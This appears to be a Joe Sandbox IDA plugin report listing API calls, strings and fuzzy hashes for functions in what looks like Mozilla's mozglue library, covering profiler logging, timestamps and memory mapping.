Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: e7da402c09b6af611a02b9743e00f820c7f47792369de1c6150b12d6e61423fe
Instruction ID: 046c4d9724e0885745c9a256f4235ce348d1688609555383b529b970b5b0e2ec
Opcode Fuzzy Hash: e7da402c09b6af611a02b9743e00f820c7f47792369de1c6150b12d6e61423fe
Instruction Fuzzy Hash: 1151ED71A09301AFDB15CF25C884B9ABBF4FF89714F00492DF999A7640D770E918CB9A

Function 6C69DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69DE73
GetCurrentThreadId.KERNEL32 ref: 6C69DF7D
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69DF8A
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69DFC9
GetCurrentThreadId.KERNEL32 ref: 6C69DFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69E000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C664A68), ref: 6C69DE7B

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C664A68), ref: 6C69DEB8
free.MOZGLUE(00000000,?,6C664A68), ref: 6C69DEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C69DF38

Strings

[I %d/%d] locked_profiler_stop, xrefs: 6C69DE83
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C69E00E
<none>, xrefs: 6C69DFD7

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: 2fcca3c07977d64dd4993d632918e94227168705532684585624f7cb7a8fc6a2
Instruction ID: 601b910b7b33fabe0a9ab561ffd34791e6424384c40c8e5f7151f0789e36a508
Opcode Fuzzy Hash: 2fcca3c07977d64dd4993d632918e94227168705532684585624f7cb7a8fc6a2
Instruction Fuzzy Hash: BC41D6357011129BDB109F66D8447AE7775EF8631DF144025E90A97B42CB71B806CBEF

Function 6C6AD4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6AD4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD52A
GetCurrentThreadId.KERNEL32 ref: 6C6AD530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD55F
free.MOZGLUE(00000000), ref: 6C6AD585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C6AD5D3
GetCurrentThreadId.KERNEL32 ref: 6C6AD5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD652
GetCurrentThreadId.KERNEL32 ref: 6C6AD658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD6A2

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 3eed7c8b0298ade49de783b97f8103c59495be1610462d0a48e51c192460f2e1
Instruction ID: 9b8953e07197604a31493b0d65dd3307c99482accd72b78eb2f8161ceeed3414
Opcode Fuzzy Hash: 3eed7c8b0298ade49de783b97f8103c59495be1610462d0a48e51c192460f2e1
Instruction Fuzzy Hash: EE516C71604705DFC704DF65C484A9ABBF4FF8A358F108A2EE95A87710DB30B945CB99

Function 6C675670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C6756D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6756E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C6756F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C675744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C6757BC
GetTickCount64.KERNEL32 ref: 6C6758CB
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C6758F3
__aulldiv.LIBCMT ref: 6C675945
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C6759B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C6DF638,?,?,?,?), ref: 6C6759E9

Strings

MOZ_APP_RESTART, xrefs: 6C6756CC

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: c6b1ea9104754a8ef7f34416b2b9287e3d37f0b01403dc47f43a0f3bf1e0d967
Instruction ID: 8a5d3d28f3501d48136d047c39752d816cf1a815167c03ec0a4cbd8a9897a4dd
Opcode Fuzzy Hash: c6b1ea9104754a8ef7f34416b2b9287e3d37f0b01403dc47f43a0f3bf1e0d967
Instruction Fuzzy Hash: 05C17C31A083809FDB15CF29C48066AF7F1BFCA714F158A5DF8C497A60D730A985CB9A

Function 6C69EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69EC8C

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69ECA1
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C69ECC5
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C69ED19
CloseHandle.KERNEL32(?), ref: 6C69ED28
free.MOZGLUE(00000000), ref: 6C69ED2F
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C69EC94

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 6f752f8e038e371429242f7d7bed7329dc5222a32dc293cb44beca4bad8acc52
Instruction ID: 2ae2e6adba9c6c1c82c3a60dad5285ffbeb87b2139405902274e78f0153f2d9b
Opcode Fuzzy Hash: 6f752f8e038e371429242f7d7bed7329dc5222a32dc293cb44beca4bad8acc52
Instruction Fuzzy Hash: 1C21E575600106AFDF009F26DC44A9A3779FF8636DF144210FD1897745DB31A80ACBAE

Function 6C698ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6C65EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C65EB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C69B392,?,?,00000001), ref: 6C6991F4

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

Strings

name, xrefs: 6C698F16
marker-chart, xrefs: 6C69905E
timeline-memory, xrefs: 6C699088
marker-table, xrefs: 6C69906C
timeline-ipc, xrefs: 6C699096
data, xrefs: 6C6990E8
stack-chart, xrefs: 6C6990B2
timeline-fileio, xrefs: 6C6990A4
timeline-overview, xrefs: 6C69907A

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: a46f793aff704f56e277412be1ddd98c51ea3a825d501873c4d8477a647ad1d8
Instruction ID: e91fcf3a85a4a0ae094e2106f39310f51662bf5ea7707ab1be9b0a83cbe8eee1
Opcode Fuzzy Hash: a46f793aff704f56e277412be1ddd98c51ea3a825d501873c4d8477a647ad1d8
Instruction Fuzzy Hash: 55B1A3B0B0120A9BDF04CF95C4917EEBBB5EF85318F204419D506ABF80D771A955CBEA

Function 6C67C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C67C5A3
WideCharToMultiByte.KERNEL32 ref: 6C67C9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C67C9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C67CA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C67CA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C67CAA5

Strings

0, xrefs: 6C67D30A
(null), xrefs: 6C67C596

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 946298515b47d45dbfcc8824a1bb1790f2a17144965091408ef7e48c0c2a008b
Instruction ID: ec663ae348d2d7e35e63457b47664be838fc7f850928f8c79191e0fbf81cf5c1
Opcode Fuzzy Hash: 946298515b47d45dbfcc8824a1bb1790f2a17144965091408ef7e48c0c2a008b
Instruction Fuzzy Hash: 2AA1B230608341AFDB20DF29C59475EBBE1AFC9758F048D2DE99AD3641D731E805CB6A

Function 6C653480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C653492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C6534A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C6534EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C65350E
__Init_thread_footer.LIBCMT ref: 6C653522
__aulldiv.LIBCMT ref: 6C653552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C65357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C653592

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

Strings

kernel32.dll, xrefs: 6C6534EA
GetSystemTimePreciseAsFileTime, xrefs: 6C653508

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: e061da427ccfffe8b3b9444bf5cfb6c200ce120e6d9a646ebd6fae84dc35615d
Instruction ID: 9855ab1f5cf0ff1ab9f91fc4aabf033d94efc2b8b54de8244a30b0250912f382
Opcode Fuzzy Hash: e061da427ccfffe8b3b9444bf5cfb6c200ce120e6d9a646ebd6fae84dc35615d
Instruction Fuzzy Hash: 5631B371B012469BDF00DFBAC888AAA77B5FB86745F204429F50193A64DB70B905CF69

Function 6C654480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C694843,?), ref: 6C6545F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C694843,?), ref: 6C65468A
free.MOZGLUE(?,?,?,?,?,?,6C694843,?), ref: 6C6546C9
free.MOZGLUE(?), ref: 6C6546EF
free.MOZGLUE(?), ref: 6C654712
free.MOZGLUE(?), ref: 6C654735
free.MOZGLUE(?), ref: 6C654758
free.MOZGLUE(?), ref: 6C65477B
free.MOZGLUE(?), ref: 6C65479E

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 42e0285ff12e1b48db14d9e7b7756cdd3e21479a2d910f018ee96b5da21308c6
Instruction ID: 5853785377ad7fac109c5e2629cf6a5aa9a57433c8303e5361673e4d80730685
Opcode Fuzzy Hash: 42e0285ff12e1b48db14d9e7b7756cdd3e21479a2d910f018ee96b5da21308c6
Instruction Fuzzy Hash: E5B1F671A001518FDB188E3CC8D07BD77A1AF42328FA846A9E416DBBC6D7B1D8748B59

Function 6C6BAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C6BAC52
CreateFileMappingW.KERNEL32 ref: 6C6BAC7D
GetSystemInfo.KERNEL32 ref: 6C6BAC98
MapViewOfFile.KERNEL32 ref: 6C6BACB0
GetSystemInfo.KERNEL32 ref: 6C6BACCD
MapViewOfFile.KERNEL32 ref: 6C6BAD05
UnmapViewOfFile.KERNEL32 ref: 6C6BAD1C
CloseHandle.KERNEL32 ref: 6C6BAD28
UnmapViewOfFile.KERNEL32 ref: 6C6BAD37
CloseHandle.KERNEL32 ref: 6C6BAD43
CloseHandle.KERNEL32 ref: 6C6BAD67

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 59696297686353adecd41f422a9d48b54b654ba51719b09777c39cf6cc7fa849
Instruction ID: 1d55252a4fddc2fce995aea856eb7163ac88f37b0f772768b4ec13c3e935887d
Opcode Fuzzy Hash: 59696297686353adecd41f422a9d48b54b654ba51719b09777c39cf6cc7fa849
Instruction Fuzzy Hash: A53190B1A043058FDB00AF7EC68826EBBF0FF85345F014A2DE98597215EB70A559CB86

Function 6C669620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C669675
__Init_thread_footer.LIBCMT ref: 6C669697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6696E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C669707
__Init_thread_footer.LIBCMT ref: 6C66971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C669773

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6697B7
FreeLibrary.KERNEL32 ref: 6C6697D0
FreeLibrary.KERNEL32 ref: 6C6697EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C669824

Strings

MapViewOfFileNuma2, xrefs: 6C6697B1
ntdll.dll, xrefs: 6C6696E3
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C669670
NtMapViewOfSection, xrefs: 6C669701

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: 35d76fc3de0d189954486bef354baa94a85d1ca9c51e24e14303b3a6d5a3e6f7
Instruction ID: c58beb77730c3bb50b81c3ab3c95484078194ae74635b95675cd758bd60d9ed7
Opcode Fuzzy Hash: 35d76fc3de0d189954486bef354baa94a85d1ca9c51e24e14303b3a6d5a3e6f7
Instruction Fuzzy Hash: 38418F757002069BDF00CFA7E8D4AD67BB4EB4A768F014529ED1597B80D730B805CFAA

Function 6C663E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?,6C663CCC), ref: 6C663EEE
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C663FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040,?,?,?,?,?,6C663CCC), ref: 6C664006
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6640A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C663CCC), ref: 6C6640AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C663CCC), ref: 6C6640C2
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C664134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C663CCC), ref: 6C664143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C663CCC), ref: 6C664157

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: f247eb4cf49074cd7f41e602e599435642a9b1894c5ac81416b866b1157663d0
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: 47A181B1A00215CFDB40CF6AC880769B7B5FF49308F2541A9D909AFB42D771E886CBA5

Function 6C6A9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6A8273), ref: 6C6A9D65
free.MOZGLUE(6C6A8273,?), ref: 6C6A9D7C
free.MOZGLUE(?,?), ref: 6C6A9D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6A9E0F
free.MOZGLUE(6C6A946B,?,?), ref: 6C6A9E24
free.MOZGLUE(?,?,?), ref: 6C6A9E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6A9EC8
free.MOZGLUE(6C6A946B,?,?,?), ref: 6C6A9EDF
free.MOZGLUE(?,?,?,?), ref: 6C6A9EF5

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

